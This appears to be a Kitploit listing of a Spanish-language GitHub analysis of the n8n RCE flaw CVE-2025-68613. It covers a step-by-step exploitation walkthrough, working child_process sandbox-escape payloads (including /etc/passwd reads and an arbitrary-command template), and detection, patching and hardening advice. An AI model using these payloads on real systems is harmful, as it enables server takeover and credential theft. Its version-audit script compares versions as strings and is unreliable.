Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) Análisis de RCE crítico + recomendaciones defensivas (validación de parches, ideas de detección y consejos de endurecimiento) | Kitploit
Herramientas/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRespuesta a Incidentes
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) Análisis de RCE crítico + recomendaciones defensivas (validación de parches, ideas de detección y consejos de endurecimiento)

Ver Repositorio
11hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Header Banner

Typing SVG

Severity CVSS Instances Status CWE

Hacker GIF Matrix GIF


Divider

📑 Índice de contenidos

  • 🎯 Resumen Ejecutivo
  • 🐛 La Vulnerabilidad
  • 🔬 Análisis Técnico
  • 💀 Walkthrough de Explotación
  • 💥 Evaluación de Impacto
  • 🔍 Detección y Respuesta
  • 🛡️ Estrategia de Mitigación
  • 📚 Referencias

🎯 Resumen Ejecutivo

Alert GIF

CVE-2025-68613 es una vulnerabilidad crítica de ejecución remota de código en la plataforma de automatización de flujos de trabajo n8n que permite a atacantes autenticados ejecutar comandos arbitrarios del sistema a través de inyección de expresiones.

⚡ Estadísticas rápidas

🔥 Métrica📊 Valor
Puntuación CVSS9.9 / 10
Instancias expuestas103,476+
Complejidad del ataqueBAJA
Autenticación requeridaSí (Bajo privilegio)
Interacción del usuarioNinguna

🎯 Datos clave

📌 Propiedad📝 Valor
Divulgado18 dic 2025
VectorRed (AV:N)
AlcanceCambiado
ImpactoCIA = ALTO
Tipo de explotaciónInyección de expresiones

🐛 La Vulnerabilidad

Bug GIF

📋 Resumen de CVE

PropiedadValor
🆔 ID de CVECVE-2025-68613
📊 Puntuación CVSS9.9 (Crítica) 🔴
🔗 Vector CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (Control inadecuado de recursos de código gestionados dinámicamente)
📦 Versiones afectadas0.211.0 → 1.120.3, 1.121.0
✅ Versiones parcheadas1.120.4, 1.121.1, 1.122.0+

🤖 ¿Qué es n8n?

n8n es una plataforma de automatización de flujos de trabajo de código abierto que permite integración sin código / con poco código en más de 400 aplicaciones. Se despliega ampliamente en:

🏢 Caso de uso📝 Descripción
🔧 DevOpsTuberías de automatización, integraciones CI/CD
🛡️ Operaciones de seguridadFlujos de trabajo SOAR, respuesta a incidentes
💼 NegociosAutomatización de procesos, flujos de datos
📊 DatosProcesos ETL, integraciones API

🔧 Causa Raíz Técnica

root@kitploit:~
🔓 CADENA DE VULNERABILIDAD:
┌─────────────────────────────────────────────────────────────────┐
│  📝 Lenguaje de expresiones n8n → Manejo dinámico de datos     │
│                           ↓                                     │
│  ⚠️  Aislamiento insuficiente del sandbox en evaluación servidor│
│                           ↓                                     │
│  💀 Expresión maliciosa escapa del sandbox                     │
│                           ↓                                     │
│  🖥️  Acceso al módulo child_process de Node.js                 │
│                           ↓                                     │
│  💥 RCE COMPLETA - Ejecución de comandos del SO               │
└─────────────────────────────────────────────────────────────────┘

🔬 Análisis Técnico

Analysis GIF

🎯 Superficie de ataque

Requisitos previos para la explotación:

#📋 Requisito📝 Detalles
1️⃣AutenticaciónCuenta de usuario válida de n8n (bajo privilegio suficiente)
2️⃣PermisosCapacidad de crear/editar flujos de trabajo
3️⃣Acceso a la redCapacidad de alcanzar la instancia de n8n

⚔️ Características del ataque

🏷️ Atributo📊 Valor🔥 Riesgo
ComplejidadBAJA (AC:L)🔴 Alto
Interacción del usuarioNinguna requerida🔴 Alto
AlcanceCambiado🔴 Crítico

🗺️ Diagrama de flujo de la vulnerabilidad

root@kitploit:~
graph TD
    A[🔐 Usuario autenticado] -->|Crea| B[📝 Nuevo flujo de trabajo]
    B -->|Inyecta| C[💀 Expresión maliciosa]
    C -->|Desencadena| D[⚡ Evaluación de expresión]
    D -->|Explota| E[🔓 Escape del sandbox]
    E -->|Accede| F[🖥️ Entorno de ejecución Node.js]
    F -->|Ejecuta| G[💥 Comando del SO vía child_process]
    G -->|Logra| H[☠️ COMPROMISO TOTAL DEL SERVIDOR]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 Walkthrough de Explotación

Hacking GIF

⚠️ AVISO: Lo siguiente es solo para fines educativos. La explotación no autorizada es ilegal.

📸 Capturas de pantalla paso a paso

🖥️ Paso 1: Acceder a la instancia n8n

Acceso inicial a la plataforma de automatización de flujos de trabajo n8n vulnerable.

n8n Welcome Screen
🔓 Panel de bienvenida de n8n - Punto de entrada


➕ Paso 2: Crear un nuevo flujo de trabajo

Crear un nuevo flujo de trabajo que contendrá el payload malicioso.

New Workflow Creation
📝 Creando nuevo flujo de trabajo con "Añadir primer paso"


⚡ Paso 3: Añadir disparador manual

Configurar el disparador del flujo de trabajo: el disparador manual permite la ejecución a demanda.

Manual Trigger Setup
🎯 Seleccionando disparador manual para la activación del flujo de trabajo


📦 Paso 4: Añadir nodo Set

Añadir el nodo "Editar campos (Set)" que contendrá la expresión maliciosa.

Set Node Selection
🔧 Añadiendo nodo "Editar campos (Set)" para la inyección del payload


💉 Paso 5: Inyectar payload RCE

El paso crítico: inyectar la expresión de escape del sandbox para lograr RCE.

RCE Payload Execution
💀 ¡La expresión maliciosa ejecuta el comando 'id' con éxito!

root@kitploit:~
// 🔴 MALICIOUS PAYLOAD (DO NOT USE ILLEGALLY)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

Salida muestra: uid=1000(node) gid=1000(node) groups=1000(node) ✅ ¡RCE CONFIRMADO!


💉 Ejemplos de payloads

Code Injection GIF

⚠️ ADVERTENCIA: Estos payloads son solo para pruebas de seguridad autorizadas. ¡El uso no autorizado es ilegal!

🔹 Comando ID (información del usuario)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 Comando PWD (directorio actual)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

🔹 Lectura de archivo (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}

🔹 Plantilla de comando personalizado

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString() })() }}

📸 PoC de lectura de archivo

passwd file read exploit
💀 Leyendo /etc/passwd - ¡Acceso completo al sistema de archivos demostrado!


📤 Salida esperada

🎯 Payload📋 Salida esperada
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdLista completa de usuarios del sistema (root, daemon, node, etc.)
envTodas las variables de entorno, incluyendo secretos
ls -la /Listado del sistema de archivos raíz

🔍 Análisis de causa raíz

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 CAUSA RAÍZ DE LA VULNERABILIDAD                                     │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  El evaluador de expresiones n8n CARECE de un saneador para evitar       │
│  que las expresiones de función accedan a:                               │
│                                                                         │
│    ❌ this.process        → Objeto de proceso de Node.js               │
│    ❌ mainModule.require  → Sistema de carga de módulos                 │
│    ❌ child_process       → Ejecución de comandos del SO                │
│                                                                         │
│  ¡Esto permite acceso directo a módulos del sistema y ejecución de      │
│  código arbitrario!                                                      │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 Resumen del impacto

🎯 Tipo de impacto📝 Descripción
💻 Ejecución arbitraria de comandosEjecutar cualquier comando del SO
📂 Acceso al sistema de archivosLeer/escribir cualquier archivo
🔑 Exposición de variables de entornoFiltración de claves API, secretos
☠️ Compromiso completo del sistemaToma de control total del servidor
🛡️ Severidad📊 Calificación
Puntuación CVSS9.9 / 10
Complejidad del ataqueBAJA
Privilegios requeridosBAJO
Interacción del usuarioNINGUNA

✅ Mitigación

Upgrade

root@kitploit:~
# 🛡️ Actualizar n8n a la versión parcheada
npm install -g n8n@latest

# O con Docker
docker pull n8n/n8n:1.122.0

🎬 Cadena de eliminación del ataque

Fase🔥 Acción💀 Impacto
1️⃣Acceso inicialAutenticarse en n8n
2️⃣EjecuciónEnviar flujo de trabajo malicioso
3️⃣PersistenciaDesplegar shell inversa / backdoor
4️⃣C2Establecer comando y control
5️⃣AccionesExfiltrar datos, movimiento lateral

☠️ Capacidades posteriores a la explotación

🎯 Acción💥 Nivel de impacto
🔑 Robo de credencialesExtraer claves API, tokens OAuth, contraseñas de BD
📤 Exfiltración de datosDatos de flujo de trabajo, registros de ejecución, información empresarial
🔒 PersistenciaTareas cron, scripts de inicio, shells web
🔀 Movimiento lateralPivotar a bases de datos, CI/CD, infraestructura en la nube
🗑️ Manipulación del flujo de trabajoModificar/destruir lógica de automatización

💥 Evaluación de Impacto

Explosion GIF

🔺 Análisis de la tríada CIA

🔴 Confidencialidad (ALTA)

  • 🔑 Claves API expuestas
  • 🔐 Tokens OAuth filtrados
  • 💾 Contraseñas de BD accesibles
  • 📜 Registros de ejecución comprometidos

🟠 Integridad (ALTA)

  • 📝 Flujos de trabajo alterados
  • ⚙️ Automatización corrupta
  • 💉 Nodos maliciosos inyectados
  • 📊 Datos manipulados

🟡 Disponibilidad (ALTA)

  • ⏹️ Servicios interrumpidos
  • 💀 Recursos agotados
  • 🔄 Flujos de trabajo terminados
  • 🖥️ Infraestructura caída

🌍 Exposición en el mundo real

Vulnerable


🔍 Detección y Respuesta

Detective GIF

🔎 Estrategias de detección

#📋 Método🔍 Qué monitorear
📜Análisis de registrosComandos inusuales del proceso n8n, expresiones fallidas
🌐RedConexiones salientes a IPs desconocidas, solicitudes POST grandes
⚡Tiempo de ejecuciónInvocaciones a child_process, spawns inesperados
📦Auditoría de versionesVerificar contra el rango de versiones vulnerables

🛠️ Script de auditoría de versiones

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 n8n version audit

echo "🔍 Comprobando versión de n8n..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  VULNERABLE: n8n $VER afectado por CVE-2025-68613"
        echo "📦 Requerido: Actualizar a 1.120.4, 1.121.1 o 1.122.0+"
        exit 2
    else
        echo "✅ SEGURO: n8n $VER está parcheado"
    fi
else
    echo "❌ n8n no encontrado en PATH"
fi

🚨 Lista de verificación de respuesta a incidentes

  • 🔌 Aislar - Desconectar el n8n afectado de la red
  • 💾 Preservar - Capturar registros y artefactos forenses
  • 🔍 Auditar - Revisar todos los flujos de trabajo en busca de expresiones maliciosas
  • 🔄 Rotar - Cambiar todas las credenciales accesibles
  • 🔀 Revisar - Buscar indicadores de movimiento lateral
  • 📦 Parchear - Actualizar a una versión segura antes de la restauración

🛡️ Estrategia de Mitigación

Shield GIF

⚡ Acciones inmediatas (Prioridad 0)

🔢 Prioridad🛠️ Acción📝 Detalles
🔴 P0PARCHEAR AHORAActualizar a 1.120.4, 1.121.1 o 1.122.0+
🟠 P1Restringir accesoLimitar la creación de flujos de trabajo a usuarios de confianza
🟡 P2Endurecimiento de contenedoresDesplegar con restricciones de seguridad

🐳 Ejemplo de endurecimiento de contenedores

root@kitploit:~
# 🛡️ Despliegue endurecido de n8n
FROM n8n/n8n:1.122.0

# 👤 Ejecutar como usuario no root
USER node

# 🔒 Aplicar estas banderas de tiempo de ejecución:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 Seguridad a largo plazo

🛡️ Medida📝 Implementación
🌐 Segmentación de redAislar instancias n8n
🔥 Reglas WAFMonitorear patrones de expresiones
📜 Registro de auditoríaHabilitar registro completo
🔍 Revisiones de seguridadEvaluaciones regulares de flujos de trabajo
🔓 Mínimo privilegioAplicar controles de acceso

💬 Pregunta para los equipo azul 🔵

Thinking GIF

¿Cómo diseñaría una regla de detección para identificar intentos de inyección de expresiones en las definiciones de flujos de trabajo de n8n antes de la ejecución, considerando la necesidad de equilibrar la seguridad con el uso legítimo de expresiones dinámicas?

Bonus: ¿Qué protecciones en tiempo de ejecución implementaría para limitar el radio de explosión si ocurre un escape del sandbox a pesar del parche?


📚 Referencias

Books GIF

📋 Avisos oficiales

  • 🔗 Detalle NVD CVE-2025-68613
  • 🔗 Aviso de Snyk

🔬 Análisis técnico

  • 📖 Orca Security: RCE crítico en n8n
  • 📖 Resecurity: Inmersión profunda en inyección de expresiones
  • 📖 SecureLayer7: Guía de explotación RCE

🎮 Recursos prácticos

  • 🧪 TryHackMe: Laboratorio CVE-2025-68613
  • 💀 Escáner PoC público

🏷️ Etiquetas

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Inyección-de-Expresiones #Automatización-de-Flujos-de-Trabajo 
#Escape-de-Sandbox #CWE-913 #Vulnerabilidad-Crítica #Pentesting #Equipo-Azul

Footer

⚠️ AVISO: Este análisis es solo para fines educativos y de seguridad defensiva.
La explotación no autorizada de vulnerabilidades es ILEGAL.

Author Updated

Profile Views

Descargar herramienta